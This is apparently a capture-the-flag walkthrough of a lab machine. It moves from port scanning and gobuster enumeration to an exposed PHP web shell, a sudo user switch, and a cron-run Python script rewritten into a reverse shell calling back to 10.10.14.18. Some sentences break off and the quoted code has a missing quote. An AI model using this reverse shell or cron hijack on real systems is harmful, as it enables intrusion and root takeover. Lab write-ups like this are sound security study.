Port Scanning, General Enumeration and Access (Nmap, Gobuster)
Initial scan showed that the only port available is 80 (HTTP)
Looks like a pretty neat tool, but not a lot to go on.
gobuster dir -u http://10.10.10.68/ -w /dirs/small.txt -x php
found the phpbash thing!
Privesc (php reverse shell, python, cronjobs)
We can upload files to the
/uploads directory in the webroot
Let’s get a real shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
Easy enough to switch to
sudo -u scriptmanager /bin/bash
There’s a scripts folder owned by
Interesting, the python script is ours but text file is owned by root?
I see, so the script runs and creates that file.
Moving the old
test.txt.bak and re-running the script we can see that the new
test.txt is owned by us. That leads me to believe that something with root privs ran that prior. Maybe a cronjob? Let’s test
It’s back and with root privs!
Let’s give this boring old
test.py some fangs.
import socket,subprocess,os,pty s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("10.10.14.18,4445)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) pty.spawn("/bin/bash")
I created the new
test.py on my machine and transferred it over. Started a listener and…